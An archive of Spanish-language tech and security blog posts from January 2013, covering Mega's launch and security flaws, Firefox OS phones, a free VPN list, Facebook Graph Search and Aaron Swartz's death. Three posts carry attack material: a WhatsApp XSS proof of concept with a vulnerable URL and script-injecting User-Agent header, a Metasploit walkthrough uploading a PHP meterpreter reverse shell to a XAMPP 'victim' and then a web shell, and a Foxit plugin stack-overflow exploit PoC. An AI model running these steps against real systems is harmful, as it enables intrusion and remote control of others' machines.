viernes, 25 de enero de 2013

Mega: primeros fallos de seguridad

Como muchos ya sabrán, el nuevo portal de descargas Mega, el sucesor de MegaUpload, se publicó el pasado domingo. En esta ocasión Kim Schmitz (alias Kim Dotcom) ha querido protegerse de la violación de derechos de autor utilizando un sistema que cifra los datos de usuario antes de que llegen a los servidores de Mega y mediante claves que sólo tienen los propios usuarios, es decir, su empresa no se hace responsable de los contenidos que alojan porque supuestamente los desconocen. Es lo que se denomina un servicio para compartir en la nube con cifrado en la parte del cliente, y ya se hizo en menor escala en otros sitios como securesha.re.

Esto evidentemente ha levantado ciertas suspicacias. Si a esto además le añadimos la polémica y la fama que preceden a este nuevo portal y sus pretensiones de gran seguridad mediante el uso de cifrado 128-bit AES y una infraestructura de clave asimétrica (2048-bit RSA), tenemos a Mega avocado a estar en el centro del huracán desde su nacimiento, algo por cierto no tan malo si tenemos en cuenta que su versión Beta cuenta desde su inicio con un ejército de Beta-testers. Y los resultados no se han hecho esperar...

En seguida se detectó un XSS en el portal y un problema (desmentido) con la generación aleatoria de números al crear claves. Además, muchos expertos en seguridad coinciden que el uso del navegador para cifrar la información abre vías de ataque como la obtención de las claves para romper SSL (el uso de métodos criptográficos en javascript se considera "peligroso") o el uso de comandos contra los servidores de Mega, muchos de ellos alojados en los Estados Unidos.

Por último, recientemente un investigador ha publicado una herramienta denominada MegaCracker capaz de romper las contraseñas "hasheadas" que se envian a los usuarios dentro del correo de confirmación al crear una nueva cuenta. Es decir, si se intercepta ese correo, es posible obtener fácilmente la contraseña del usuario de Mega, una contraseña que se utiliza para cifrar la clave AES y de momento no es posible cambiar...


Fuente

jueves, 24 de enero de 2013

Mozilla presenta smartphones con Firefox OS


 
Mozilla, Telefónica y Geeksphone han presentado los primeros terminales con Firefox OS destinados a desarrolladores.
 
Firefox OS es un nuevo sistema operativo de código abierto que está siendo desarrollado por Mozilla y Telefónica. Basado en HTML 5, Firefox OS está llamado a ser una alternativa a los dominadores actuales del mercado iOS y Android. En concreto, el nuevo SO de Mozilla puede ser especialmente interesante para su instalación en dispositivos de gama media enfocados a países en desarrollo.

La compañía española Geeksphone ha sido la encargada de fabricar dos dispositivos para desarrolladores en los que testar el nuevo sistema operativo Firefox OS. En la fabricación de los terminales han cooperado Telefónica y Mozilla Developer Network.

La fabricación de estos nuevos terminales para desarrolladores es fundamental para asegurar que el ecosistema está preparado para cuando los primeros smartphones salgan al mercado durante 2013. De esta forma, con los terminales presentados será posible probar algunas características como el rendimiento real de los dispositivos o la interacción con la red móvil.

Dos nuevos terminales: Keon y Peak

Los terminales fabricados por Geeksphone son Keon y Peak. El modelo Keon cuenta con procesador Qualcomm 7225A de 1 GHz, pantalla de 3,5 pulgadas y cámara de 3 megapíxeles. En cuanto a Peak, está equipado con procesador Qualcomm 8225 a 1,2GHz dual core, pantalla de 4,3 pulgadas y cámara trasera de 8 megapíxeles y frontal de 1,3 megapíxeles. Ambos smartphones cuentan con versiones de desarrollo de Firefox OS.

Estamos encantados de incorporar Firefox OS a nuestros dispositivos Desde Geeksphone se han mostrado encantados con poder ser una parte fundamental en el desarrollo del nuevo sistema operativo. "Estamos encantados de trabajar junto a Telefónica y Mozilla para incorporar Firefox OS a nuestros dispositivos, y poder probar este sistema operativo en un entorno real", ha asegurado el cofundador y CTO de Geeksphone, Javier Agüera.

Planes de lanzamiento

Telefónica ha estado trabajando junto a Mozilla, otras operadoras móviles y varios fabricantes de terminales, para desarrollar conjuntamente Firefox OS. La operadora ha confirmado que pretende lanzar terminales con Firefox OS a los usuarios de sus distintos mercados durante 2013.

Para conseguir que el lanzamiento de Firefox OS sea un éxito entre sus clientes, Telefónica ha decidido adquirir varios dispositivos de Geeksphone para testeo interno y para distribuir gratis entre los desarrolladores.

Telefónica pretende lanzar los terminales con Firefox OS durante 2013 "Para que Firefox OS sea un éxito necesitamos asegurar un rico ecosistema que asegure la mejor experiencia de usuario desde el primer día. Y sólo será posible si le damos a los desarrolladores las herramientas adecuadas para que así sea", ha explicado el director de desarrollo de producto e innovación de Telefónica Digital, Carlos Domingo.


La intención de la compañía es distribuir varios dispositivos de Geeksphone entre los desarrolladores durante la próxima Campus Party Brasil, que tendrá lugar en Sao Paulo desde el próximo 28 de enero. En el evento, Telefónica será el anfitrión en varios talleres y hackathons de Firefox OS, donde los desarrolladores podrán probar sus propias aplicaciones usando estos dispositivos.

Por su parte, Mozilla también será el anfitrión de la presentación de los App Days de Firefox OS, una cita mundial de más de 20 días en la que se ayudará a los desarrolladores a crear aplicaciones para este sistema operativo.

Los desarrolladores que deseen solicitar un Keon o un Peak cuando estén disponibles pueden visitar la web de Geeksphone para más información.

 


FUENTE 

Chad2Win, la aplicación que le paga por chatear


cydia jailbreak

Técnicamente hablando, el iPhone 5 ya tiene un jailbreak, sólo que nosotros aún no podemos tenerlo. La razón para ésto es que uno de los bugs (fallas) que contribuyen a un jailbreak funcional es tan bueno, que los hackers que lo descubrieron están buscando otro para reemplazarlo y así evitar que Apple pueda aprender de éste y arreglarlo para el próximo debut del iOS 6.1.

Uno de los hackers que trabaja en una forma de liberar el teléfono de Apple, David Wang (@Planetbeing), afirmó en Reddit que “el hecho es que yo tengo un iOS 6.0.2 JB untethered (o sea, que no es necesario hacerle jailbreak cada vez que se apaga el teléfono, pues éste carga desde el booteo) corriendo ahora mismo en mi iPhone 5“.

Wango afirmó a Techcrunch, quienes realizaron un reportaje respecto al estado actual del jailbreak, que “esta vulnerabilidad es realmente buena porque nos deja ver que es lo que ocurre en el teléfono. Necesitamos ser capaces de observar el código que estamos tratando de modificar, porque sino, prácticamente estamos trabajando en la oscuridad“.

O sea, en el peor de los escenarios los hackers tendrían que ‘matar’ su técnica actual –este gran bug que encontraron– para lanzar el jailbreak al público, sólo que aún no quieren hacerlo porque como ya han encontrado cuatro bugs en el iPhone 5, puede ser que encuentren otro que les permita mantener oculto el que ahora tienen para así poder seguir realizando jailbreaks en los futuros modelos.

De momento, Wang afirma que esperan lanzar un jailbreak al menos antes de fin de año, o por lo menos antes del próximo iPhone.

Link: Behind The Scenes Of The iPhone 5 Jailbreak (TechCrunch)

martes, 22 de enero de 2013

25 servicios VPN gratuitos for fun and profit

A estas alturas todos sabemos que una red privada virtual (VPN) permite cifrar los datos de las conexiones entre dos nodos, permitiendo no sólo la navegación web (como es el caso de los llamados proxies anónimos) si no también el uso de otros protocolos para correo electrónico, mensajería instantánea, voz sobre IP (VoIP) y cualquier otro servicio de Internet.

Existen muchos servicios VPN disponibles y la mayoría se utilizan para mantener el anonimato, si bien es importante decir que esto dependerá en gran medida de la confianza que deposites en el proveedor del servicio, ya que muchos registran tus pasos y podrían facilitar los logs si las autoridades así lo requiriesen, e incluso los más legales lo advierten en la aceptación de sus políticas de uso si existe abuso. No obstante, existen algunos proveedores que sitúan sus servidores en países en los que todavía no está definida claramente una legalidad y se comprometen a no almacenar ningún registro de conexión, pero eso ya es cuestión de confianza...

 
Otro de los típicos usos que se les da a estas VPNs es la de mantener la privacidad de las comunicaciones, dado que los datos irán cifrados desde el cliente hasta el terminador de túneles, invalidando así toda probabilidad de éxito para un ataque MiTM en ese tramo... y digo en ese tramo porque evidentemente el tráfico desde el servidor del proveedor al sitio a visitar viajará sin cifrar, por lo que la seguridad en este caso no sería completa.
Sin embargo, si podríamos hablar de mayor privacidad a la hora de esconder un poco nuestra huella digital, donde cookies y otros registros se verán afectados y pondrán un poco más difícil la tarea a las plataformas de ads.

Por último y quizás la principal ventaja de las VPNs es la evasión. Primero para evitar la censura mediante geo-controles al presentarnos con la IP pública de otro país, tan útil para ver servicios web xenófobosrestrictivos como Hulu o Netflix, algo que no siempre es muy efectivo porque sobretodo las IPs de los servidores VPN más famosos son añadidos en blacklists y por tanto bloqueados. Otro uso de
evasión es para los firewalls que no podrán determinar el protocolo del tráfico cifrado que atraviesa el túnel. Es decir, si un firewall permite el estableciemiento de un túnel o simplemente no puede evitarlo porque se enmascara mediante otro protocolo, es decir no tiene deep inspection, pues entonces la seguridad del perímetro queda comprometida.
Actualmente existen numerosos proveedores que ofrecen distintos servicios VPN con distintas implementaciones como IPSec, SSL/TLS, L2TP o PPTP. Algunos facilitan su propio cliente y otros permiten utilizar algún otro existente como OpenVPN. La mayoría son fáciles y transparentes de usar y poseen servicios premium de pago que aumentan sus capacidades como más velocidad y ancho de banda o mayor volumen de datos transferidos al mes. A continuación echaremos un vistazo a 25 servicios VPN que al menos ofrecen servicios gratuitos en distinta medida:

1. AceVPN

Dispone de servidores en 13 países y un servicio gratuito accesible por invitaciones. Es multiplataforma: Microsoft Windows, Apple Mac, Linux, iPhone, iPod touch, iPad, Android, etc.

2. AnchorFree Hotspot VPN

VPN para anonimizar tráfico en los Estados Unidos que ofrece la empresa Anchor Free. Válido para Windows y Mac. Algunos sitios como Hulu detectan los servidores de Anchor Free y los bloquean.

3. CyberGhost

Es un servicio gratuito de VPN de Alemania, que te ayudará a encaminar tu conexión a través de una IP alemana. El servicio gratuito está limitado a 1 GB de tráfico al mes, más que suficiente para navegar, chatear y mandar correos. El servicio de pago es también muy asequible.

4. Free VPN by WSC

Apenas agrega una latencia de 10 a 50 ms. La reproducción de streaming contra servidores británicos y estadounidenses funciona sin problemas, sin interrupciones y la reproducción es instantánea. Tiene un diseño más simple, más servidores y es menos intrusivo que Anchor Free. 

  
5. GPass  


El servicio de GPass proporciona acceso gratuito a VPNs, así como un proxy muy rápido que se puede utilizar directamente desde el navegador. El servicio es muy popular en China, donde la censura en Internet es de lo mas común.


6. Hostizzle

Servicio que te ofrece mensualmente 10 mb gratis, y funciona con Hulu, por lo tanto quiere decir que tenemos IP de USA. Lo único es que cada mes es necesario renovar el certificado para la conexión. 

7. Hotspot Shield

Este es, posiblemente, el cliente VPN gratuito más popular del mundo. Se hizo popular cuando Hulu se puso en marcha. Ahora, tienen  servicios de VPN en Estados Unidos y el Reino Unido que se pueden utilizar para protegerse de los fisgones WiFi, robos de identidad y censuras. Lo mejor de Hotspot Shield es que proporciona ancho de banda ilimitado y funciona tanto en PC como Mac.

8. It's hidden

Utiliza cifrado de 128 bits para securizar el tunel hacia sus servidores. Con sede en Holanda, se aprovecha del clima legal de allí y no guarda ningún log ni registro de actividad.


9. JAP VPN

JAP (llamado también JonDo) está escrito en java y por lo tanto es multiplataforma. Utiliza una secuencia de servidores intermediarios para garantizar la privacidad y el anonimato.


10. MacroVPN  


Después del registro, se tiene 4 direcciones de servidor VPN para elegir. Uno de Italia, y los otros tres de EE.UU., se debe elegir uno y crear una nueva conexión VPN, entonces se puede obtener acceso al servicio de MacroVPN con el nombre de usuario y contraseña elegidos.


11. OkayFreedom

Servicio que ofrece gratuitamente 500 mb más 100 mb adicionales por recomendación (hasta 1gb). Puedes seleccionar manualmente el país de los servidores, actualmente Alemania, Suiza, Gran Bretaña o EE.UU.
 

12. OpenVPN

Es una VPN mediante SSL/TLS que proporciona alta seguridad y privacidad. La mayor diferencia entre VPN PPTP y OpenVPN es que necesita instalar el software cliente de OpenVPN para usar el servicio. No trabaja con dispositivos móviles como iPhone, iPad, Windows Mobile y Android. Pero OpenVPN funciona en Windows, Mac y Linux .

13. PacketiX.NET

Es un servicio de VPN japonés. En realidad, es un servicio premium, pero tienen un servicio de prueba de línea de uso gratuito. El servicio es rápido y fiable y también es fácil de usar. Sólo tienes que descargar el administrador de conexión VPN, instalar y conectar. Funciona en Windows y Linux.

14. proXPN

No tiene límite de volumen de datos, pero su limitación llega por el lado de la velocidad: su pico máximo es de 300 kilobits por segundo para las cuentas sin coste. Dispone de servicios OpenVPN y PPTP y tiene versiones para Windows, Mac, iOS y Android.


15. RaptorVPN  


Proporciona una conexión VPN con su propio cliente VPN o con el que el usuario elija. Ofrece conexiones VPN en los protocolos VPN PPTP (Point-to-Point Tunneling) y L2TP (Layer 2 Tunneling), no sólo para cifrar la comunicación, sino también aplicar técnicas efectivas de integridad de datos. Recientemente ha pasado a formar parte de Spotflux.


16. RealVPN

Utiliza OpenVPN y está también disponilble para smartphones. En su web tienen una política de aceptación de uso ("AUP") y avisan claramente que si no se cumple la cuenta puede ser suspendida e incluso tomar las acciones legales pertinentes.


17. Spotflux


Una de las principales características es su sencillez, su interfaz principal solo contiene un par de botones. No requiere de mucho una vez instalado: solo ejecuta, presiona un botón y olvídate de él. Cifra y asegura tu conexión. Ideal para navegar por redes públicas. Si requieres configurar un proxy, el programa te permitirá hacerlo sin ningún problema. Quizá su única desventaja sea la velocidad.

18. SecurityKiss

Es un servicio de túnel que garantiza la seguridad y la privacidad de sus datos una vez que salen de tu ordenador. Se vuelve a dirigir todo el tráfico a través de un túnel impenetrable a una pasarela de seguridad. Toda la comunicación en el túnel es cifrada.

19. Shield Exchange

Un servicio de VPN que te permite crear un cuenta Trial o Free en la cual te dan 100MB de navegacion gratuita anual, por lo tanto y dada esta limitación es un servicio que se puede utilizar en casos de emergencia o que las otras alternativas te fallen.

20. TorVPN

Es uno de los últimos en entrar al mercado de las VPNs. TorVPN es bueno para pasar por los estrictos filtros de contenido, navegar por la web de manera anónima, para asegurar su comunicación VoIP o el acceso remoto al trabajo desde tu casa/oficina. Con TorVPN puedes conseguir un servidor OpenVPN, acceso SSH, PPTP y Proxy TOR. El acceso gratis a la VPN se limita a 1 GB por mes y funciona en Windows, Mac, iPhone y iPad.
 

Es probablemente uno de los servicios VPN más fáciles de usar. TunnelBear te dará acceso a sitios geo-restringidos. Si registras una cuenta gratuita dispondrás de 500 mb al mes,  aunque puedes elevar esa cifra a 1 gb simplemente asociando tu cuenta de Twitter.

22. UltraVPN

Es un cliente de VPN francés que oculta la conexión y permite el uso de aplicaciones bloqueadas. También se basa en el servicio OpenVPN. El tráfico es ilimitado. El ancho de banda es de hasta 500 Kb/s, dependiendo de las condiciones de la red.

23. USA IP

Para la versión gratuita no es necesario registrarse, basta con descargar el archivo USAIP.pbk, hacer doble clic en el archivo y seleccionar una de las conexiones PPTP. Después podrás acceder a los servicios gratuitos con el nombre de usuario demo y contraseña demo. Pero es necesario volver a conectar la red IP USA cada 7 minutos....
 
24. VPNBook
 
Túnel PPTP que soporta Microsoft Windows, Linux, Apple, móviles y PS3, que además ofrece la posibilidad de usar OpenVPN si tu ISP o gobierno bloquea el protocolo.

25. Your-Freedom

Hace accesible lo inaccesible y oculta su dirección de red. El servicio gratuito le permite utilizarlo durante 6 horas al día (durante 15 horas a la semana). Puedes descargar el software o usarlo en modo OpenVPN. Es compatible con plataformas Windows, Mac y Linux.

Fuentes:
 

sábado, 19 de enero de 2013

Abrió Mega.co.nz, ya está disponible para ciertos usuarios y ésto es lo que ya sabemos



En Nueva Zelanda ya es 19 de enero del 2013, lo que significa que para algunos usuarios ya está disponible Mega.co.nz, el sucesor de Megaupload que fue cerrado por el FBI hace exactamente un año atrás junto a un polémico allanamiento a la mansión del dueño de la empresa, el excéntrico alemán apodado Kim Dotcom.

El sitio tiene una apariencia bastante similar a otros servicios de hosteo de archivos en la nube. Para su uso óptimo, el equipo de Mega afirmó en una entrada de su blog: “Si planeas utilizar Mega de forma frecuente, no hay mejor alternativa que ocuparlo con el mejor navegador actual, Google Chrome“.


Algunos de los usuarios ya están informando de las próximas novedades del sitio, entre las que se encontrará soporte para acceso desde celulares, procesadores de texto y de hojas de cálculo, entre otras funciones de suites ofimáticas como también calendario, e incluso un servicio de mensajería instantánea.

Entre la documentación del sitio también afirman que se encuentra en beta un servicio para montar Mega como una unidad de disco duro virtual en Windows, Linux y Mac OS X, como lo que hoy ofrece Google Drive o Dropbox.

Además, con ésto ya se sabe cuanto costará el servicio Premium. Como les informamos ayer, Mega ofrece un paquete básico y gratis de 50 GB, pero ahora sabemos que hay tres niveles de servicios pagados: €9,99 (US$ 13,27), €19,99 (US$ 26,56) y €29,99 (US$ 39,85) mensuales, lo que corresponde a 500 GB de almacenamiento / 1 TB de ancho de banda, 2 TB/4TB y 4TB/8TB respectivamente.

Por su parte, el CEO de Instra e inversionista en Mega, Brian Clarkson, afirmó en una entrevista con TechCrunch que Mega también ofrecerá el servicio de registro de dominios a través de Instra, como también de hosteo de páginas web y de correo electrónico.

Sin embargo un dato relevante que afirma Clarkson en la entrevista es que los dueños de Mega son un grupo de inversionistas de Nueva Zelanda, Australia y Luxemburgo. Kim Dotcom no es dueño de nada en Mega. “Kim es un asesor de este negocio“, afirmó Clarkson.

Link: Kim Dotcom’s Mega Opens For Early-Access Users, Reveals Pricing Tiers, Roadmap With Mobile Access, IM, Office-Style Features (TechCrunch)

Fuente: http://www.fayerwayer.com/2013/01/me...rtos-usuarios/

Otra: http://www.genbeta.com/web/se-desvel...-hay-sorpresas

jueves, 17 de enero de 2013

Facebook presenta su propio buscador: Graph Search



La herramienta Graph Search permitirá a los usuarios hacer búsquedas como si fuera un mapa; está basada en personas, fotografías, lugares e intereses que se encuentran en Facebook.

Facebook anunció este martes una nueva herramienta de búsqueda.

"No estamos haciendo un índice de la red. Estamos haciendo un mapa que es grande y está cambiando", indicó el CEO de la red social, Mark Zuckerberg, en un encuentro con periodistas.

Zuckerberg indicó que se trata de una herramienta de búsqueda que permita tener acceso a las cosas que las personas comparten en la red social.


La herramienta estará basada en personas, fotografías, lugares e intereses. También permite buscar cosas como "Amigos a los que les guste Star Wars y Harry Potter para una noche en el cine".


Las acciones de la red social en el Nasdaq operan con una baja de 2.06%, para venderse en 30.31 dólares a
media jornada del martes, según la página del centro bursatil.

De acuerdo con el
Wall Street Journal, la herramienta daría respuesta a las búsquedas a las que Google no puede responder.

Zuckerberg afirmó que Graph Search trabajará dinámicamente mientras el usuario escribe su búsqueda, parecido a la forma en la que trabaja Google.


"Buscamos algo que pensamos se vería más natural".


En un comunicado, Facebook indicó que las búsquedas web y Graph Search son distintas, ya que con este último puedes buscar cualquier contenido que se haya compartido contigo en la red social y otros pueden buscar contenido que has compartido con ellos. Cada persona ve resultados exclusivos.


Detalló que otra diferencia es que cada contenido en Facebook tiene su propia audiencia y que el material no siempre es público.


"Construimos Graph Search con la privacidad en mente, y respeta la privacidad y la audiencia de cada contenido en Facebook".


Durante el evento han mencionado los 3 pilares de Facebook:
News Feed, el TimeLine y ahora Graph Search, una nueva forma para compartir y descubrir. Mark Zuckerberg, CEO de Facebook anunció que no indexarán la web, sino que indexarán el mapa, algo que, asegura, está siempre en constante cambio.

Mark dijo que Graph Search mostrará la respuesta, no el link a la respuesta – refiriéndose a una forma para diferir de Google o
motores de búsqueda similares. Durante el evento Mark comentó que Graph Search está en pañales, pero que dio una demostración bastante interesante. Por ejemplo, en el sitio de Facebook se podrá escribir “mostrar la música que le gusta a mis amigos” e inmediatamente ver los resultados. 



Pero esto no sólo se queda en gustos, también puede mostrar los mejores restaurantes/sitios de interés en ciudades o pueblos pequeños. Las búsquedas se podrán hacer desde la barra superior dentro de Facebook, en donde aparecerá una F de la red social.


Graph Search no competirá con Google, pues éste último es un
motor de búsqueda generalizado, mientras que el de Facebook se concentrará en mostrar información relacionada con nuestros amigos, sin importar la fecha. Graph Search está en beta y hasta ahora no se saben detalles del lanzamiento oficial. Mark Zuckerberg hizo bastante énfasis en que todo será privado y los usuarios decidirán qué compartir y qué mostrar en resultados de búsqueda.

Otra de los usos que Graph Search tendrá es el de encontrar a personas con gustos similares, permitir el reclutamiento de una forma nueva, encontrar a gente que ha trabajado en diferentes lugares y con experiencia; las opciones son muchas. También se podrá buscar algo como “imágenes en Guadalajara” y mostrará imágenes del lugar; imágenes que han sido compartidas en la red social – cada usuario definirá qué compartir y qué no.


Para poder probar Graph Search desde ya, sólo necesitas entrar al
sitio de la herramienta y comenzar. Es bastante intuitivo y no se desesperen, recuerden que es un servicio en fase Beta, pero hasta donde voy el servicio parece bastante robusto y bien avanzado.





 

FUENTE 

Whatsapp XSS Headers [USER-AGENT]

... como habia comentado antes sobre mi tiempo de inactividad, hoy decidí divertirme un RATO para aprovechar esos 15 o 30 min sin nada que hacer... ¿Que mejor diversion que divagar en sitios buscando pequeños, basicos o avanzados XSS's ?

Pues bien no pasaron mas de 2:38 Min-Seg cuando ingrese a Whatsapp y note el lindo "detector" de USER-AGENT.



Pues como siempre tenemos ese instinto de "curiosidad" intentamos morir como le paso al pequeño gato curioso, en fin no somos gatos... Por experiencia conozco el tipico pensamiento mediocre de muchos programadores el cual consiste en dedicarle menos tiempo a lo "INTERNO" y que otros usuarios "no pueden ver"... Demasiado mediocre como descuidar Headers, Libs, filtros, etc; Nunca se sabe que tan rapido evoluvione un ataque y benificio XSS asi que segun mi opinion personal es mejor prevenir, aunque este no sea tan CRITICO y LETAL.


PoC 


Url Vulnearble
: https://sro.whatsapp.net/client/iphone/iq.php?cd=1&cc=%3CA%3E&me=%3CB%3E&u[]=%3CC%3E

 
?
1
2
3
4
5
6
7
8
------------------------------------------------------------------------------
Host: sro.whatsapp.net
User-Agent: [Vuln XSS Simple] <script>alert('@Mazt0r Was Here!')</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
------------------------------------------------------------------------------

Result




Nota: una vulnerabilidad basica y sencilla pero se presta para mucha diversion. (Si entienden a lo que me refiero). 
 

 [Verguenza usar Windows :( --- Pero No tengo PC al momento]


Saludos y Happy Hacking!


Fuente 

Spotbros triunfará porque puedes gritar lo que quieres

No hace mucho me habalaron de una herramienta para enviar mensajes cortos - sí, tipo Whatsapp -, pero con características de geo-localización agregadas. La gracia de la herramienta, de nombre Spotbros, es que permite crear salas de chat "spots" asociados a ubicaciones GPS y que son accesibles a todas las personas cercanas, pudiendo crearse salas de debate en conferencias, o zonas de fiesta. Por supuesto, como en todas las aplicaciones sociales, se busca cualquier oportunidad para ligar, y hay muchas salas creadas para hablar de sexo... aunque esta parece que no tiene mucha popularidad entre el público femenino.


Figura 1: El spot Sexo de aquí no tenía mucho éxito entre las mujeres

Y es extraño, pues hay gente unida de gran nivel como Leo Mesi, Salami de Oferta o Cabecilla Porro... que tiene una foto de perfil de lo más elegante y sugerente. Esto en Spotbros es una pasada. Ya que sin unirte a un Spot puedes ver la gente que está unida, lo que puede ser de lo más "indiscreto". Luego a alguien se le ocurre buscar estos contactos en Twitter - similar a lo que hizo Yago Jesus con Ashley Madisson - y puede ser muy divertido.
Figura 2: Foto de perfil de Cabecilla porro...

De todas las caracteristicas distintas, existe una especial, llamada Shout que permite enviar un mensaje a todos los usuarios cerca de tu posición GPS, como si fuera un grito auténtico. Por supuesto, estas características también se están explotando para lo que a todos se os está ocurriendo: Ligar.  Así, en cualquier momento te puede llegar un shout de gente con actitud de querer debatir sobre los problemas de re-población de especies en riesgo de extinción, con fotos de lo más sugerentes.

Y si no, algunos con intenciones mucho más directas, como este Shout que recibió mi amigo David Barroso visitando una zona de Madrid. Se puede ver en la foto de perfil su mirada profunda...

Figura 3: Este hombre parece que tiene buena conversación

Visto esto, que se ha creado una herramienta que sirve para "chatear", estoy convencido que triunfará, porque la gente al final termina por sacar el "verdadero" partido a estas aplicaciones.





miércoles, 16 de enero de 2013

[Metasploit] Hackeando XAMPP Remotamente (Windows XP 7 - 8)



------------------------------------------------------------------------------------------------------------------
XAMPP es una forma fácil de instalar la distribución Apache que contiene MySQL, PHP y Perl. XAMPP es realmente simple de instalar y usar - basta descargarlo, extraerlo y comenzar.

La distribución de Windows 2000, 2003, XP, Vista y 7 contiene Apache, MySQL, PHP + PEAR, Perl, mod_php, mod_perl, mod_ssl, OpenSSL, phpMyAdmin, Webalizer, Mercury Mail Transport System for Win32 and NetWare Systems v3.32, Ming, FileZilla FTP Server, mcrypt, eAccelerator, SQLite, and WEB-DAV + mod_auth_mysql.
------------------------------------------------------------------------------------------------------------------


Actualmente el servicio XAMPP, usado por la mayoria de webmasters y usuarios que se dedican a la Programación Web son totalmente vulnerables y se ha creado un modulo en metasploit que explota contraseñas débiles WebDAV en los servidores XAMPP y utiliza credenciales proporcionadas para subir una carga útil de PHP y ejecutarlo. El exploit se encuentra disponible desde XAMPP WebDAV PHP Upload y los pasos para aprovecharse de esta vulnerabilidad, son los siguientes:

REQUERIMIENTOS:

  • BackTrack 5 R1 - R2 o R3 (Atacante)
  • Metasploit Framework (Atacante)
  • Windows XP - 7 - 8 (Victima)
  • XAMPP (Victima)

PROCEDIMIENTOS:

Primeramente tenemos que detectar si la PC victima esta ejecutando el servicio XAMPP, para ello usaremos Nmap, ejecutando el siguiente comando:
  • nmap -sS -T4 -A 192.168.1.38

Si los resultados se muestran tal cual con la imagen de arriba, quiere decir que la PC victima esta ejecutando el servicio XAMPP en el puerto 80 y 443, entonces para aprovecharnos de la vulnerabilidad mencionada lineas arriba, simplemente abriremos metasploit y ejecutamos los siguientes comandos:

-------------------------------------------------------------------------------------------------------------
use exploit/windows/http/xampp_webdav_upload_php
set payload php/meterpreter/reverse_tcp
set Lhost 192.168.1.36 (Nuestra IP)
set RHOST 192.168.1.38 (IP Victima)
exploit
-------------------------------------------------------------------------------------------------------------



Estos comandos haran que se ejecute un payload en php la cual automaticamente se "subira" en el servicio XAMPP de la PC victima.



Seguidamente si todo se realizo correctamente, recibiremos la session meterpreter gracias al payload que metasploit subio al servicio XAMPP vulnerable.


Lo demas ya queda a nuestra total disposicion, en este caso podemos subir una web shell ya que XAMPP es un servicio web, por lo que podemos ingresar desde nuestro navegador a la IP vulnerada y ejecutar comandos desde la shell.

Espero les sirva y practiquen ;)

martes, 15 de enero de 2013

Aaron Swartz ha muerto

Aaron Swartz fue una de las grandes mentes responsables de que el internet y la web sea tal y como la conocemos hoy. Se suicidó ayer, 11 de enero de 2013 en New York, a sus 26 años. Una de sus mayores aportaciones fue trabajar en la especificación del RSS 1.0, uno de los estándares más adoptados para compartir y diseminar información y contenidos entre webs, especialmente los blogs. Lo hizo a los 14 años.


También trabajó, junto a Larry Lessig, en los primeros borradores de lo que sería después las licencias Creative Commons. También puede ser considerado uno de los co-fundadores de Reddit, construyendo gran parte de lo que sucede "tras bambalinas" para que la web funcione. En 2004 ayudó a John Gruber en el desarrollo de Markdown, el cual es usado por millones de personas, que facilita la escritura con HTML en la web.

Swartz invirtió una fortuna para liberar contenido legal estadounidense por medio de RECAP, que permite a cualquier persona acceder de forma sencilla a documentos de la plataforma PACER (Public Access to Court Electronic Records), como lo explica Cory Doctorow. En septiembre de 2010 plantó un portátil en el MIT y descargó una gran cantidad de documentos académicos (muchos de ellos en el dominio público, pero muchos con copyright) y lo recogió. En algún punto fue acusado por la universidad y por JSTOR (un sistema de archivo en línea de publicaciones académicas) pero, aunque decidieron echarse para atrás, el gobierno estadounidense continuó su investigación, y Aaron Swartz fue arrestado acusado de crímenes informáticos. También fundó DemandProgress desde la cual se inició una protesta en contra de SOPA/PIPA).

El internet es hoy un lugar mejor gracias a Aaron Swartz. Se lo extrañará mucho.

Fuente: Alt1040

Vulnerabilidad crítica en el plugin Foxit PDF de Firefox (o aquí no se salva ni Perry)

Desde hace tiempo utilizo Foxit Reader como lector pdf por defecto, es ligero, rápido y consume menos recursos que Adobe Reader. Además el malware viene azotando continuamente a Adobe por simple economía de guerra: la mayoría de los usuarios lo utilizan y las probabilidades de propagarse son mayores. ¿Puedo entonces embutirme en mi batín mientras azuzo el fuego de una chimenea y entono el publicitario eslogan "me siento seguroooo"? Ni mucho menos...

Desde Adobe Reader X la seguridad se orienta al sandboxing y se han aplicado y se aplican múltiples correcciones como consecuencia de las vulnerabilidades descubiertas por un ejército de beta-testers deseosos de abrir las puertas a sus artefactos maliciosos. Por eso quizás Foxit Reader no sea el enemigo público número uno, pero eso no significa que sea más seguro.


El consultor italiano Andrea Micalizzi, alias rgod, nos lo recuerda recientemente mediante la publicación de una vulnerabilidad que afecta, eso sí, al plugin Foxit PDF para el navegador. Es decir, el bug no está presente en el lector PDF en sí mismo, si no en la librería npFoxitReaderPlugin.dll que actúa como intermediaria entre Foxit Reader y el navegador.


Concretamente el código es vulnerable a un desbordamiento de pila al procesar enlaces con peticiones largas. La prueba de concepto es contundente: actualmente funciona en la última versión de Firefox (18.0) y en la última versión de Foxit Reader (5.4.4.1128) con su plugin (2.2.1.530).  

 
Echemos un vistazo al código de rgod:

 

 <?php/*

Foxit Reader <= 5.4.4.1128 Plugin for Firefox npFoxitReaderPlugin.dll Overlong 
Query String Remote Stack Buffer Overflow PoC --------------------------- rgod

(listener)

Tested against Microsoft Windows
Mozilla Firefox 17.0.1
Foxit Reader 5.4.3.0920
Foxit Reader 5.4.4.1128

File: npFoxitReaderPlugin.dll
Version: 2.2.1.530

Product url: http://www.foxitsoftware.com/downloads/
Last version setup file: FoxitReader544.11281_enu_Setup.exe

Usage:
Launch from the command line, then browse port 6666 with Firefox.
You can test it also through this url:

http://192.168.0.1/x.pdf?[A x 1024]

File must be existing or the server should be responding with
the proper Content-Type header.

vulnerable code, npFoxitReaderPlugin.dll:

;------------------------------------------------------------------------------
 L1000162F:
    push ebx
    push esi
    push edi
    mov edi,ebp
    or ecx,FFFFFFFFh
    xor eax,eax
    xor ebx,ebx
    xor esi,esi
    repne scasb
    not ecx
    dec ecx
    test ecx,ecx
    jle L100016E4
 L1000164A:
    mov al,[esi+ebp]
    mov word ptr [esp+18h],0000h
    cmp al,25h
    jz  L10001661
    mov ecx,[esp+1Ch]
    mov [ebx+ecx],al
    jmp L100016CE
 L10001661:
    mov al,[esi+ebp+01h]
    cmp al,30h
    jl  L1000166D
    cmp al,39h
    jle L1000167D
 L1000166D:
    cmp al,41h
    jl  L10001675
    cmp al,46h
    jle L1000167D
 L10001675:
    cmp al,61h
    jl  L100016C6
    cmp al,66h
    jg  L100016C6
 L1000167D:
    mov dl,[esi+ebp+01h]
    inc esi
    inc esi
    lea ecx,[esp+10h]
    mov [esp+18h],dl
    push ecx
    mov al,[esi+ebp]
